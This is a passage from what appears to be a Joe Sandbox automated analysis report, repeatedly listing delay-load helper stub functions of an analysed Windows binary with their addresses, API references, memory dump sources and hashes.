                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 4ab24fd03857152a6dc1c5e227676260a91960834cb1a33ae276e0e098faf4bb
                                                                                              • Instruction ID: 2cea33501258ffae2a2af0b90864bc3c4941211d239fe3a0416089729e05a831
                                                                                              • Opcode Fuzzy Hash: 4ab24fd03857152a6dc1c5e227676260a91960834cb1a33ae276e0e098faf4bb
                                                                                              • Instruction Fuzzy Hash: 3DB012E325C040BD3A04D10B6D07E3F019CC1C8B10330C07EF81DC10C1DC416D012432
                                                                                              Function 00C7E246 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E1E3
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 9396bff357a32ebd57ef1dc70d2de14c40cdd42eb1c7fee18cc0d82468da0e09
                                                                                              • Instruction ID: 47ed0f0f28e855ced8a3a676cbbe7640d91ecaf1caea40793a1f9e24f04bf9c7
                                                                                              • Opcode Fuzzy Hash: 9396bff357a32ebd57ef1dc70d2de14c40cdd42eb1c7fee18cc0d82468da0e09
                                                                                              • Instruction Fuzzy Hash: DDB012D329D080BD3A44E10A6C07E3F010DC1C9B10330C07EFC1DC50C1D840AC002432
                                                                                              Function 00C7E250 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E1E3
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 8d9a9728287dcaccc13a34f7beb3d93a17522de53575019a7677f6d145c07fbd
                                                                                              • Instruction ID: 63b7b52de0fa39ebbdc2539dda746ddf6cdb346e70e46b6658e9833a461d3187
                                                                                              • Opcode Fuzzy Hash: 8d9a9728287dcaccc13a34f7beb3d93a17522de53575019a7677f6d145c07fbd
                                                                                              • Instruction Fuzzy Hash: B9B012E325D180BD3A84D20A6C07E3F010DC1C8B10330C17EF81DC50C1D840AC442432
                                                                                              Function 00C7E264 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E1E3
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 1d7a827d47587e5bd7d2f3724a84f118745ca95a125fdf87c20405ed4e10477c
                                                                                              • Instruction ID: 01a17d1c138d0534dba63b32d693a9b5d7dc0278190b986539d1e276da500a97
                                                                                              • Opcode Fuzzy Hash: 1d7a827d47587e5bd7d2f3724a84f118745ca95a125fdf87c20405ed4e10477c
                                                                                              • Instruction Fuzzy Hash: B7B012D326D080BD3A44D10A6C07E3F014DC5C8B10330C07EF81EC50C1D8406C002432
                                                                                              Function 00C7E26E Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E1E3
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 549a7ad3cc831c26261b603061c9d932197a07e403a14e42ee4a2426b053781d
                                                                                              • Instruction ID: 3d9c6165d9d39633c8252d2994a0a5acce3181e92e4a2808fddc8bb573b88e9b
                                                                                              • Opcode Fuzzy Hash: 549a7ad3cc831c26261b603061c9d932197a07e403a14e42ee4a2426b053781d
                                                                                              • Instruction Fuzzy Hash: ABB012D325C040BD3A04E11A6C07E3F015CC1C9B10330C07EFC1DC10C1D840AC002432
                                                                                              Function 00C7E200 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E1E3
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: ae1c5b819fbdf90385bc4f59e4e18f7289fe56b7368c0a8ae3fd8fd356d9f4b9
                                                                                              • Instruction ID: 950309f742fedd9beba4d8a6a8bab0844f55d73e106735ab565f5d27f7ad930c
                                                                                              • Opcode Fuzzy Hash: ae1c5b819fbdf90385bc4f59e4e18f7289fe56b7368c0a8ae3fd8fd356d9f4b9
                                                                                              • Instruction Fuzzy Hash: 38B012D335C180BD3A44D20A6C07E3F010CC1C8B10330C17EF81DC11C1D8406C442432
                                                                                              Function 00C7E20A Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E1E3
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: b934f9b6664820453d92a292b289a4fce2ee649b699a9d2f2ec4d8c390550c41
                                                                                              • Instruction ID: cd4f2377916bf8ab1c958a78c20540296b81f1ad52f479fa54a2e664ec1bf979
                                                                                              • Opcode Fuzzy Hash: b934f9b6664820453d92a292b289a4fce2ee649b699a9d2f2ec4d8c390550c41
                                                                                              • Instruction Fuzzy Hash: 87B092D2258040BD2A04920A6907E3A010CC188B10320C07EF819C1181985069092432
                                                                                              Function 00C7E21E Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E1E3
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: f99403b523272db922ba89799fd3b5a74bfd63c24d8a1e5c890a5ac59d3f44d7
                                                                                              • Instruction ID: 2c531f105328d42a488adabcfe68020ebe457de1a80c0ca7a70ad9ce8c653f30
                                                                                              • Opcode Fuzzy Hash: f99403b523272db922ba89799fd3b5a74bfd63c24d8a1e5c890a5ac59d3f44d7
                                                                                              • Instruction Fuzzy Hash: 08B092E3258040BD2A04A10A6807E3A010CC189B10320C07EF81AC14819840A9002432
                                                                                              Function 00C7E228 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E1E3
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 8e65296384b1f815eb329285412943ad3ce652962cdeaf122563540449efa5b0
                                                                                              • Instruction ID: fa093381982ab48cab8d1e34548d570a56d17718bb111fff617776478dcbff03
                                                                                              • Opcode Fuzzy Hash: 8e65296384b1f815eb329285412943ad3ce652962cdeaf122563540449efa5b0
                                                                                              • Instruction Fuzzy Hash: 73B012E325C140BD3B44D10A6C07E3F010CC1C8F10330C17EF81EC14C1D8406D402432
                                                                                              Function 00C7E232 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E1E3
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 2b9ca17bc07980654f4f9c64f7b4f840de39ad0e063763df583b3583e7087e48
                                                                                              • Instruction ID: cbea0005fede783fca53bb7f2b05167ba1609f48f7b6bb07f286e77e82e20ee3
                                                                                              • Opcode Fuzzy Hash: 2b9ca17bc07980654f4f9c64f7b4f840de39ad0e063763df583b3583e7087e48
                                                                                              • Instruction Fuzzy Hash: EAB092E2258040BD2A04910A6907E3A010CC188B10320C07EF81AC1481D8406A012432
                                                                                              Function 00C7E23C Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E1E3
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: bc97e4a772e891e5570ffde91b4c91f207711a82fe9b476a2d408ba76f21f90f
                                                                                              • Instruction ID: e033327396a2df242ff6f3436407b7616eb5ecafa38970d64a1702d29a5cb40d
                                                                                              • Opcode Fuzzy Hash: bc97e4a772e891e5570ffde91b4c91f207711a82fe9b476a2d408ba76f21f90f
                                                                                              • Instruction Fuzzy Hash: 75B092E2258040BD3A04910A6807E3A010CC188B10320C07EF81AC1481984069002432
                                                                                              Function 00C7E44B Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E3FC
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 1fded111f5832f0e24f750e2f4a58368ca9ed7bd1e45e25d5ca20d4077d3e07b
                                                                                              • Instruction ID: 6fd29e3c77fb0d57efff6734e00670ba122a69766e20e1b99f8504a04ad53846
                                                                                              • Opcode Fuzzy Hash: 1fded111f5832f0e24f750e2f4a58368ca9ed7bd1e45e25d5ca20d4077d3e07b
                                                                                              • Instruction Fuzzy Hash: EFB012E3258040FC3704E10A6C06E37021CC1C8B10330C07FF81CC10C0D8404C041433
                                                                                              Function 00C7E419 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E3FC
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 9af98e9b345b44d1de498a89aa7734566288d1b2a29fc49ce85b6290f4ebfbb0
                                                                                              • Instruction ID: cb5d523db2aea6c132bced6399543f45a6eb2dfecd49d7ed9b3d5ea8c341700b
                                                                                              • Opcode Fuzzy Hash: 9af98e9b345b44d1de498a89aa7734566288d1b2a29fc49ce85b6290f4ebfbb0
                                                                                              • Instruction Fuzzy Hash: 9DB012E3258040BC3704910A6D06E37021CC1C8B10330C07EF51CC10C0D8400C092433
                                                                                              Function 00C7E423 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E3FC
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: bf01b551a00b29ea371790342d766aeef388cb15ceaed9bfe66e3ad9e42606d2
                                                                                              • Instruction ID: cb1f01bbc21e455c312364237675e7cb8ab303dca9d3f5b5577f4dd91e5af7c6
                                                                                              • Opcode Fuzzy Hash: bf01b551a00b29ea371790342d766aeef388cb15ceaed9bfe66e3ad9e42606d2
                                                                                              • Instruction Fuzzy Hash: 6EB012F3258040FC3704E10A6C06E37021CC1C8F10330C07EF81CC14C0D8404E001433
                                                                                              Function 00C7E593 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E580
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
